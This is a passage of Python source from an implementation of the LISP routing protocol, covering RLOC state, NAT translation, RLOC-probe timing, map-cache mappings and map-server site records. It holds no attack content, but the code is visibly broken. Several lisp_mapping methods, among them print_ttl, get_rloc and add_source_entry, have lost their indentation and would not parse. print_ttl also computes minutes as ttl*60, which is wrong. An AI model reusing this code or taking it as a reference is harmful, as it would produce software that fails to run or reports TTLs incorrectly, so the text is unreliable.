        # True for either the down or admin-down state.
        return(self.state in \
            [LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
    #enddef
    def print_state(self):
        #
        # Return the state as a display string.
        #
        # NOTE(review): these use 'is' identity comparisons on integer
        # constants — correct only because CPython caches small ints;
        # '==' would be the safe form.
        #
        if (self.state is LISP_RLOC_UNKNOWN_STATE):
            return("unknown-state")
        if (self.state is LISP_RLOC_UP_STATE):
            return("up-state")
        if (self.state is LISP_RLOC_DOWN_STATE):
            return("down-state")
        if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
            return("admin-down-state")
        if (self.state is LISP_RLOC_UNREACH_STATE):
            return("unreach-state")
        if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
            return("no-echoed-nonce-state")
        return("invalid-state")
    #enddef
    def print_rloc(self, indent):
        #
        # Log a one-line summary of this RLOC.
        #
        ts = lisp_print_elapsed(self.uptime)
        lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
            red(self.rloc.print_address(), False), ts, self.print_state(),
            self.priority, self.weight, self.mpriority, self.mweight))
    #enddef
    def print_rloc_name(self, cour=False):
        #
        # Return "rloc-name: <name>" (optionally courier-formatted), or ""
        # when the RLOC has no name.
        #
        if (self.rloc_name == None): return("")
        rloc_name = self.rloc_name
        if (cour): rloc_name = lisp_print_cour(rloc_name)
        return('rloc-name: {}'.format(blue(rloc_name, cour)))
    #enddef
    def store_rloc_from_record(self, rloc_record, nonce, source):
        #
        # Populate this RLOC from a received RLOC-record: address, NAT
        # translation state, geo/elp/rle/json attributes, policy parms,
        # and any crypto keys. Returns the encap port to use.
        #
        port = LISP_DATA_PORT
        self.rloc.copy_address(rloc_record.rloc)
        self.rloc_name = rloc_record.rloc_name
        #
        # Store translated port if RLOC was translated by a NAT.
        #
        rloc = self.rloc
        if (rloc.is_null() == False):
            nat_info = lisp_get_nat_info(rloc, self.rloc_name)
            if (nat_info):
                port = nat_info.port
                head = lisp_nat_state_info[self.rloc_name][0]
                addr_str = rloc.print_address_no_iid()
                rloc_str = red(addr_str, False)
                rloc_nstr = "" if self.rloc_name == None else \
                    blue(self.rloc_name, False)
                #
                # Don't use timed-out state. And check if the RLOC from the
                # RLOC-record is different than the youngest NAT state.
                #
                if (nat_info.timed_out()):
                    lprint((" Matched stored NAT state timed out for " + \
                        "RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
                    nat_info = None if (nat_info == head) else head
                    if (nat_info and nat_info.timed_out()):
                        port = nat_info.port
                        rloc_str = red(nat_info.address, False)
                        lprint((" Youngest stored NAT state timed out " + \
                            " for RLOC {}:{}, {}").format(rloc_str, port,
                            rloc_nstr))
                        nat_info = None
                    #endif
                #endif
                #
                # Check to see if RLOC for map-cache is same RLOC for NAT
                # state info.
                #
                if (nat_info):
                    if (nat_info.address != addr_str):
                        lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
                            format(rloc_str, red(nat_info.address, False)))
                        self.rloc.store_address(nat_info.address)
                    #endif
                    rloc_str = red(nat_info.address, False)
                    port = nat_info.port
                    lprint(" Use NAT translated RLOC {}:{} for {}". \
                        format(rloc_str, port, rloc_nstr))
                    self.store_translated_rloc(rloc, port)
                #endif
            #endif
        #endif
        self.geo = rloc_record.geo
        self.elp = rloc_record.elp
        self.json = rloc_record.json
        #
        # RLE nodes may be behind NATs too.
        #
        self.rle = rloc_record.rle
        if (self.rle):
            for rle_node in self.rle.rle_nodes:
                rloc_name = rle_node.rloc_name
                nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
                if (nat_info == None): continue
                port = nat_info.port
                rloc_name_str = rloc_name
                if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
                lprint((" Store translated encap-port {} for RLE-" + \
                    "node {}, rloc-name '{}'").format(port,
                    rle_node.address.print_address_no_iid(), rloc_name_str))
                rle_node.translated_port = port
            #endfor
        #endif
        self.priority = rloc_record.priority
        self.mpriority = rloc_record.mpriority
        self.weight = rloc_record.weight
        self.mweight = rloc_record.mweight
        if (rloc_record.reach_bit and rloc_record.local_bit and
            rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
        #
        # Store keys in RLOC lisp-crypto data structure.
        #
        rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
            source != None else None
        if (rloc_record.keys != None and rloc_is_source):
            key = rloc_record.keys[1]
            if (key != None):
                addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
                    str(port)
                key.add_key_by_rloc(addr_str, True)
                lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
                    lisp_hex_string(nonce), red(addr_str, False)))
            #endif
        #endif
        return(port)
    #enddef
    def store_translated_rloc(self, rloc, port):
        #
        # Record the NAT-translated RLOC address and encap port.
        #
        self.rloc.copy_address(rloc)
        self.translated_rloc.copy_address(rloc)
        self.translated_port = port
    #enddef
    def is_rloc_translated(self):
        # True when NAT translation state has been stored for this RLOC.
        return(self.translated_rloc.is_null() == False)
    #enddef
    def rloc_exists(self):
        #
        # True when this record carries a real RLOC address (as opposed to
        # only an rle/geo/elp/json attribute name).
        #
        if (self.rloc.is_null() == False): return(True)
        if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
            return(False)
        #endif
        return(True)
    #enddef
    def is_rtr(self):
        # RTRs advertise the distinguished parms 254/0/255/0.
        return((self.priority == 254 and self.mpriority == 255 and \
            self.weight == 0 and self.mweight == 0))
    #enddef
    def print_state_change(self, new_state):
        #
        # Return "old -> new" for logging; bolded when an unreachable RLOC
        # comes back up.
        #
        current_state = self.print_state()
        string = "{} -> {}".format(current_state, new_state)
        if (new_state == "up" and self.unreach_state()):
            string = bold(string, False)
        #endif
        return(string)
    #enddef
    def print_rloc_probe_rtt(self):
        # Return the last probe RTT, or "none" when never measured.
        if (self.rloc_probe_rtt == -1): return("none")
        return(self.rloc_probe_rtt)
    #enddef
    def print_recent_rloc_probe_rtts(self):
        # Return the recent-RTT history with -1 shown as "?".
        rtts = str(self.recent_rloc_probe_rtts)
        rtts = rtts.replace("-1", "?")
        return(rtts)
    #enddef
    def compute_rloc_probe_rtt(self):
        #
        # Compute the probe RTT from the last request/reply timestamps and
        # push the previous value onto the recent-RTT history.
        #
        last = self.rloc_probe_rtt
        self.rloc_probe_rtt = -1
        if (self.last_rloc_probe_reply == None): return
        if (self.last_rloc_probe == None): return
        self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
        self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
        last_list = self.recent_rloc_probe_rtts
        self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
    #enddef
    def print_rloc_probe_hops(self):
        # Return the "to/from" hop-count string.
        return(self.rloc_probe_hops)
    #enddef
    def print_recent_rloc_probe_hops(self):
        # Return the recent hop-count history.
        hops = str(self.recent_rloc_probe_hops)
        return(hops)
    #enddef
    def store_rloc_probe_hops(self, to_hops, from_ttl):
        #
        # Derive to/from hop counts from probe TTLs ("?" unknown, "!" when
        # the TTL is implausibly low) and push the previous value onto the
        # history list.
        #
        if (to_hops == 0):
            to_hops = "?"
        elif (to_hops < LISP_RLOC_PROBE_TTL/2):
            to_hops = "!"
        else:
            to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
        #endif
        if (from_ttl < LISP_RLOC_PROBE_TTL/2):
            from_hops = "!"
        else:
            from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
        #endif
        last = self.rloc_probe_hops
        self.rloc_probe_hops = to_hops + "/" + from_hops
        last_list = self.recent_rloc_probe_hops
        self.recent_rloc_probe_hops = [last] + last_list[0:-1]
    #enddef
    def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
        #
        # Handle an RLOC-probe reply: find the chain entry whose nonce
        # matches, mark it up, record RTT/hops, and on multihomed systems
        # re-install the host route via the best-RTT next-hop.
        #
        rloc = self
        while (True):
            if (rloc.last_rloc_probe_nonce == nonce): break
            rloc = rloc.next_rloc
            if (rloc == None):
                lprint(" No matching nonce state found for nonce 0x{}". \
                    format(lisp_hex_string(nonce)))
                return
            #endif
        #endwhile
        rloc.last_rloc_probe_reply = lisp_get_timestamp()
        rloc.compute_rloc_probe_rtt()
        state_string = rloc.print_state_change("up")
        if (rloc.state != LISP_RLOC_UP_STATE):
            # RLOC transitioned to up: tell the RTR code and checkpoint
            # the map-cache entry.
            lisp_update_rtr_updown(rloc.rloc, True)
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()
            mc = lisp_map_cache.lookup_cache(eid, True)
            if (mc): lisp_write_ipc_map_cache(True, mc)
        #endif
        rloc.store_rloc_probe_hops(hop_count, ttl)
        probe = bold("RLOC-probe reply", False)
        addr_str = rloc.rloc.print_address_no_iid()
        rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
        p = ":{}".format(self.translated_port) if self.translated_port != 0 \
            else ""
        nh = ""
        if (rloc.rloc_next_hop != None):
            d, n = rloc.rloc_next_hop
            nh = ", nh {}({})".format(n, d)
        #endif
        e = green(lisp_print_eid_tuple(eid, group), False)
        lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
            "to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
            state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
        if (rloc.rloc_next_hop == None): return
        #
        # Now select better RTT next-hop.
        #
        rloc = None
        install = None
        while (True):
            rloc = self if rloc == None else rloc.next_rloc
            if (rloc == None): break
            if (rloc.up_state() == False): continue
            if (rloc.rloc_probe_rtt == -1): continue
            if (install == None): install = rloc
            if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
        #endwhile
        if (install != None):
            d, n = install.rloc_next_hop
            nh = bold("nh {}({})".format(n, d), False)
            lprint(" Install host-route via best {}".format(nh))
            lisp_install_host_route(addr_str, None, False)
            lisp_install_host_route(addr_str, n, True)
        #endif
    #enddef
    def add_to_rloc_probe_list(self, eid, group):
        #
        # Register this RLOC (keyed by "addr[:port]") in the global probe
        # list for the given (eid, group), replacing any stale entry, and
        # inherit unreachability from the RLOC actively being probed.
        #
        addr_str = self.rloc.print_address_no_iid()
        port = self.translated_port
        if (port != 0): addr_str += ":" + str(port)
        if (lisp_rloc_probe_list.has_key(addr_str) == False):
            lisp_rloc_probe_list[addr_str] = []
        #endif
        if (group.is_null()): group.instance_id = 0
        for r, e, g in lisp_rloc_probe_list[addr_str]:
            if (e.is_exact_match(eid) and g.is_exact_match(group)):
                if (r == self):
                    if (lisp_rloc_probe_list[addr_str] == []):
                        lisp_rloc_probe_list.pop(addr_str)
                    #endif
                    return
                #endif
                lisp_rloc_probe_list[addr_str].remove([r, e, g])
                break
            #endif
        #endfor
        lisp_rloc_probe_list[addr_str].append([self, eid, group])
        #
        # Copy reach/unreach state from first RLOC that the active RLOC-probing
        # is run on.
        #
        rloc = lisp_rloc_probe_list[addr_str][0][0]
        if (rloc.state == LISP_RLOC_UNREACH_STATE):
            self.state = LISP_RLOC_UNREACH_STATE
            self.last_state_change = lisp_get_timestamp()
        #endif
    #enddef
    def delete_from_rloc_probe_list(self, eid, group):
        #
        # Remove this RLOC's entry for (eid, group) from the global probe
        # list, dropping the address key entirely when its list empties.
        #
        addr_str = self.rloc.print_address_no_iid()
        port = self.translated_port
        if (port != 0): addr_str += ":" + str(port)
        if (lisp_rloc_probe_list.has_key(addr_str) == False): return
        array = []
        for entry in lisp_rloc_probe_list[addr_str]:
            if (entry[0] != self): continue
            if (entry[1].is_exact_match(eid) == False): continue
            if (entry[2].is_exact_match(group) == False): continue
            array = entry
            break
        #endfor
        if (array == []): return
        try:
            lisp_rloc_probe_list[addr_str].remove(array)
            if (lisp_rloc_probe_list[addr_str] == []):
                lisp_rloc_probe_list.pop(addr_str)
            #endif
        except:
            return
        #endtry
    #enddef
    def print_rloc_probe_state(self, trailing_linefeed):
        #
        # Return a multi-line display of probe request/reply times and RTT
        # for every RLOC in the next-hop chain.
        #
        output = ""
        rloc = self
        while (True):
            sent = rloc.last_rloc_probe
            if (sent == None): sent = 0
            resp = rloc.last_rloc_probe_reply
            if (resp == None): resp = 0
            rtt = rloc.print_rloc_probe_rtt()
            s = space(4)
            if (rloc.rloc_next_hop == None):
                output += "RLOC-Probing:\n"
            else:
                d, n = rloc.rloc_next_hop
                output += "RLOC-Probing for nh {}({}):\n".format(n, d)
            #endif
            output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
                "received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
                s, lisp_print_elapsed(resp), rtt)
            if (trailing_linefeed): output += "\n"
            rloc = rloc.next_rloc
            if (rloc == None): break
            output += "\n"
        #endwhile
        return(output)
    #enddef
    def get_encap_keys(self):
        #
        # Return (encrypt-key, icv-key) for this RLOC's encap address, or
        # (None, None) when no key state exists.
        #
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.rloc.print_address_no_iid() + ":" + port
        try:
            keys = lisp_crypto_keys_by_rloc_encap[addr_str]
            if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
            return(None, None)
        except:
            return(None, None)
        #endtry
    #enddef
    def rloc_recent_rekey(self):
        #
        # True when this RLOC's encap key was rekeyed within the last
        # second (or has never been rekeyed since creation).
        #
        port = "4341" if self.translated_port == 0 else \
            str(self.translated_port)
        addr_str = self.rloc.print_address_no_iid() + ":" + port
        try:
            key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
            if (key == None): return(False)
            if (key.last_rekey == None): return(True)
            return(time.time() - key.last_rekey < 1)
        except:
            return(False)
        #endtry
    #enddef
#endclass
class lisp_mapping():
    """
    An EID-to-RLOC mapping: used for both the map-cache (xTR/RTR) and
    the local database-mappings. Holds the EID (and group for (S,G)
    entries), the rloc-set, TTL/refresh state, and counters.
    """
    def __init__(self, eid, group, rloc_set):
        """
        eid/group may be lisp_address()es or "" (meaning AFI-none).
        rloc_set is a list of lisp_rloc() entries.
        """
        self.eid = eid
        if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = group
        if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.rloc_set = rloc_set
        self.best_rloc_set = []
        self.build_best_rloc_set()
        self.uptime = lisp_get_timestamp()
        self.action = LISP_NO_ACTION
        self.expires = None
        # map_cache_ttl is in seconds; None means the entry never expires.
        self.map_cache_ttl = None
        self.last_refresh_time = self.uptime
        # source_cache holds (S,G) source entries when this is a (*,G).
        self.source_cache = None
        self.map_replies_sent = 0
        self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.use_mr_name = "all"
        self.use_ms_name = "all"
        self.stats = lisp_stats()
        self.dynamic_eids = None
        self.checkpoint_entry = False
        self.secondary_iid = None
        self.signature_eid = False
        self.gleaned = False
        self.recent_sources = {}
    #enddef
    def print_mapping(self, eid_indent, rloc_indent):
        """
        Log a one-line summary of this mapping followed by one line per
        RLOC, using the supplied indent strings.
        """
        ts = lisp_print_elapsed(self.uptime)
        group = "" if self.group.is_null() else \
            ", group {}".format(self.group.print_prefix())
        lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
            green(self.eid.print_prefix(), False), group, ts,
            len(self.rloc_set)))
        for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
    #enddef
    def print_eid_tuple(self):
        """Return the "(eid, group)" display string for this mapping."""
        return(lisp_print_eid_tuple(self.eid, self.group))
    #enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
    def build_best_rloc_set(self):
        """
        Recompute self.best_rloc_set: all RLOCs at the best (lowest)
        priority among up RLOCs, plus unreachable RLOCs at equal-or-
        better priority so they keep getting RLOC-probed. Also syncs
        membership in the global lisp_rloc_probe_list.
        """
        old_best = self.best_rloc_set
        self.best_rloc_set = []
        if (self.rloc_set == None): return
        #
        # Get best priority for first up RLOC.
        #
        pr = 256
        for rloc in self.rloc_set:
            if (rloc.up_state()): pr = min(rloc.priority, pr)
        #endif
        #
        # For each up RLOC with best priority, put in best-rloc for data-plane.
        # For each unreachable RLOC that has better priority than the best
        # computed above, we want to RLOC-probe. So put in the RLOC probe list
        # and best list. We need to set the timestamp last_rloc_probe or
        # lisp_process_rloc_probe_timer() will think the unreach RLOC went
        # down and is waiting for an RLOC-probe reply (it will never get).
        #
        for rloc in self.rloc_set:
            if (rloc.priority <= pr):
                if (rloc.unreach_state() and rloc.last_rloc_probe == None):
                    rloc.last_rloc_probe = lisp_get_timestamp()
                #endif
                self.best_rloc_set.append(rloc)
            #endif
        #endfor
        #
        # Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
        # we removed the RLOC out of the best list, we need to remove
        # references.
        #
        for rloc in old_best:
            if (rloc.priority < pr): continue
            rloc.delete_from_rloc_probe_list(self.eid, self.group)
        #endfor
        for rloc in self.best_rloc_set:
            if (rloc.rloc.is_null()): continue
            rloc.add_to_rloc_probe_list(self.eid, self.group)
        #endfor
    #enddef
    def select_rloc(self, lisp_packet, ipc_socket):
        """
        Data-plane RLOC selection for an encap decision. Hashes the
        inner packet header to load-split across best_rloc_set, skips
        non-up RLOCs, and returns a 6-element list:
        [rloc-address, port, echo-nonce, native-forward-action, rle,
        rloc-entry], with None for fields that do not apply.
        """
        packet = lisp_packet.packet
        inner_version = lisp_packet.inner_version
        length = len(self.best_rloc_set)
        if (length == 0):
            self.stats.increment(len(packet))
            return([None, None, None, self.action, None, None])
        #endif
        # Hash inner addresses (and ports when load-splitting pings).
        ls = 4 if lisp_load_split_pings else 0
        hashval = lisp_packet.hash_ports()
        if (inner_version == 4):
            for i in range(8+ls):
                hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
            #endfor
        elif (inner_version == 6):
            for i in range(0, 32+ls, 4):
                hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
            #endfor
            hashval = (hashval >> 16) + (hashval & 0xffff)
            hashval = (hashval >> 8) + (hashval & 0xff)
        else:
            for i in range(0, 12+ls, 4):
                hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
            #endfor
        #endif
        if (lisp_data_plane_logging):
            best = []
            for r in self.best_rloc_set:
                if (r.rloc.is_null()): continue
                best.append([r.rloc.print_address_no_iid(), r.print_state()])
            #endfor
            dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
                hex(hashval), hashval % length, red(str(best), False)))
        #endif
        #
        # Get hashed value RLOC.
        #
        rloc = self.best_rloc_set[hashval % length]
        #
        # IF this RLOC is not in up state but was taken out of up state by
        # not receiving echoed-nonces, try requesting again after some time.
        #
        echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
        if (echo_nonce):
            echo_nonce.change_state(rloc)
            if (rloc.no_echoed_nonce_state()):
                echo_nonce.request_nonce_sent = None
            #endif
        #endif
        #
        # Find a reachabile RLOC.
        #
        if (rloc.up_state() == False):
            stop = hashval % length
            index = (stop + 1) % length
            while (index != stop):
                rloc = self.best_rloc_set[index]
                if (rloc.up_state()): break
                index = (index + 1) % length
            #endwhile
            if (index == stop):
                self.build_best_rloc_set()
                return([None, None, None, None, None, None])
            #endif
        #endif
        #
        # We are going to use this RLOC. Increment statistics.
        #
        rloc.stats.increment(len(packet))
        #
        # Give RLE preference.
        #
        if (rloc.rle_name and rloc.rle == None):
            if (lisp_rle_list.has_key(rloc.rle_name)):
                rloc.rle = lisp_rle_list[rloc.rle_name]
            #endif
        #endif
        if (rloc.rle): return([None, None, None, None, rloc.rle, None])
        #
        # Next check if ELP is cached for this RLOC entry.
        #
        if (rloc.elp and rloc.elp.use_elp_node):
            return([rloc.elp.use_elp_node.address, None, None, None, None,
                None])
        #endif
        #
        # Return RLOC address.
        #
        rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
        port = rloc.translated_port
        action = self.action if (rloc_addr == None) else None
        #
        # Check to see if we are requesting an nonce to be echoed, or we are
        # echoing a nonce.
        #
        nonce = None
        if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
            nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
        #endif
        #
        # If no RLOC address, check for native-forward.
        #
        return([rloc_addr, port, nonce, action, None, rloc])
    #enddef
    def do_rloc_sets_match(self, rloc_address_set):
        """
        Return True when every address in rloc_address_set appears in
        this mapping's rloc-set and the sets are the same size.
        """
        if (len(self.rloc_set) != len(rloc_address_set)): return(False)
        #
        # Compare an array of lisp_address()es with the lisp_mapping()
        # rloc-set which is an array of lisp_rloc()s.
        #
        # NOTE(review): the inner loop leaks its loop variable as a
        # "no match" sentinel — on a match it is set to None before
        # breaking, otherwise it ends as the set's last element. This
        # misjudges a set whose last element is literally None; confirm
        # callers never pass such a set.
        #
        for rloc_entry in self.rloc_set:
            for rloc in rloc_address_set:
                if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
                rloc = None
                break
            #endfor
            if (rloc == rloc_address_set[-1]): return(False)
        #endfor
        return(True)
    #enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
    def add_db(self):
        """
        Insert this mapping into the database-mapping lookup cache.
        (S,G) entries are stored as source entries under a (*,G) parent
        created on demand.
        """
        if (self.group.is_null()):
            lisp_db_for_lookups.add_cache(self.eid, self)
        else:
            db = lisp_db_for_lookups.lookup_cache(self.group, True)
            if (db == None):
                db = lisp_mapping(self.group, self.group, [])
                lisp_db_for_lookups.add_cache(self.group, db)
            #endif
            db.add_source_entry(self)
        #endif
    #enddef
    def add_cache(self, do_ipc=True):
        """
        Insert this mapping into the map-cache. (S,G) entries hang off
        a (*,G) parent created on demand. When do_ipc is True the new
        entry is pushed to the data-plane via IPC.
        """
        if (self.group.is_null()):
            lisp_map_cache.add_cache(self.eid, self)
            if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
        else:
            mc = lisp_map_cache.lookup_cache(self.group, True)
            if (mc == None):
                mc = lisp_mapping(self.group, self.group, [])
                mc.eid.copy_address(self.group)
                mc.group.copy_address(self.group)
                lisp_map_cache.add_cache(self.group, mc)
            #endif
            # A null source EID means "any source" — use a default route.
            if (self.eid.is_null()): self.eid.make_default_route(mc.group)
            mc.add_source_entry(self)
        #endif
        if (do_ipc): lisp_write_ipc_map_cache(True, self)
    #enddef
    def delete_cache(self):
        """
        Remove this mapping from the map-cache (and the data-plane via
        IPC), cleaning up probe-list references. For an (S,G), remove
        the source entry and the (*,G) parent when it empties.
        """
        self.delete_rlocs_from_rloc_probe_list()
        lisp_write_ipc_map_cache(False, self)
        if (self.group.is_null()):
            lisp_map_cache.delete_cache(self.eid)
            if (lisp_program_hardware):
                prefix = self.eid.print_prefix_no_iid()
                os.system("ip route delete {}".format(prefix))
            #endif
        else:
            mc = lisp_map_cache.lookup_cache(self.group, True)
            if (mc == None): return
            smc = mc.lookup_source_cache(self.eid, True)
            if (smc == None): return
            mc.source_cache.delete_cache(self.eid)
            if (mc.source_cache.cache_size() == 0):
                lisp_map_cache.delete_cache(self.group)
            #endif
        #endif
    #enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
class lisp_dynamic_eid():
    """
    Run-time state for one dynamic-EID (mobile host) discovered on an
    interface, including its idle timeout.
    """
    def __init__(self):
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.interface = None
        self.last_packet = None
        self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
    #enddef

    def get_timeout(self, interface):
        """
        Load the configured dynamic-EID timeout for 'interface'; fall
        back to the default when the interface is unknown or has no
        timeout configured.
        """
        try:
            self.timeout = lisp_myinterfaces[interface].dynamic_eid_timeout
        except:
            self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
        #endtry
    #enddef
#endclass
class lisp_group_mapping():
    """
    Configured multicast group-mapping: a named group-prefix with its
    allowed sources, the map-server name to use, and an optional RLE
    address.
    """
    def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
        self.group_name = group_name
        self.group_prefix = group_prefix
        self.sources = sources
        self.use_ms_name = ms_name
        self.rle_address = rle_addr
    #enddef

    def add_group(self):
        """Register this mapping in the global group-mapping table."""
        lisp_group_mapping_list[self.group_name] = self
    #enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
    """
    Return the group-mapping prefix's mask-length when IPv4 group
    address 'group_str' is more specific than the mapping's
    group-prefix; return -1 otherwise.
    """
    prefix = group_mapping.group_prefix
    group = lisp_address(LISP_AFI_IPV4, group_str, 32, prefix.instance_id)
    return(prefix.mask_len if group.is_more_specific(prefix) else -1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
    """
    Longest-match lookup of group address 'group' across all configured
    group-mappings; return the best lisp_group_mapping() or None.
    """
    best_gm = None
    best_len = -1
    for gm in lisp_group_mapping_list.values():
        ml = lisp_is_group_more_specific(group, gm)
        if (ml > best_len):
            best_gm = gm
            best_len = ml
        #endif
    #endfor
    return(best_gm)
#enddef
#
# lisp_site_flags
#
# Descriptions for the Map-Register flag letters displayed by
# lisp_site_eid.print_flags(); the {} placeholder is filled with ""
# or "not " depending on whether the flag is set.
#
lisp_site_flags = {
    "P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
    "S": "ETR is {}LISP-SEC capable",
    "I": "xTR-ID and site-ID are {}included in Map-Register",
    "T": "Use Map-Register TTL field to timeout registration is {}set",
    "R": "Merging registrations are {}requested",
    "M": "ETR is {}a LISP Mobile-Node",
    "N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
    """
    A configured map-server site: authentication material, allowed
    EID-prefixes/RLOCs, and Map-Notify counters.
    """
    def __init__(self):
        # Identity.
        self.site_name = ""
        self.description = ""
        self.shutdown = False
        # Authentication and encryption configuration.
        self.auth_sha1_or_sha2 = False
        self.auth_key = {}
        self.encryption_key = None
        # Registration constraints.
        self.allowed_prefixes = {}
        self.allowed_prefixes_sorted = []
        self.allowed_rlocs = {}
        # Counters.
        self.map_notifies_sent = 0
        self.map_notify_acks_received = 0
    #enddef
#endclass
class lisp_site_eid():
    """
    Per-EID-prefix registration state kept by a map-server for one
    site: registered RLOCs, Map-Register flags, and (S,G) and
    more-specific child bookkeeping.
    """
    def __init__(self, site):
        """site: the owning lisp_site() configuration entry."""
        self.site = site
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.first_registered = 0
        self.last_registered = 0
        self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
        self.registered = False
        self.registered_rlocs = []
        self.auth_sha1_or_sha2 = False
        # Per-xTR registrations when merge-registrations is in effect.
        self.individual_registrations = {}
        self.map_registers_received = 0
        # Flags copied from the Map-Register message.
        self.proxy_reply_requested = False
        self.force_proxy_reply = False
        self.force_nat_proxy_reply = False
        self.force_ttl = None
        self.pitr_proxy_reply_drop = False
        self.proxy_reply_action = ""
        self.lisp_sec_present = False
        self.map_notify_requested = False
        self.mobile_node_requested = False
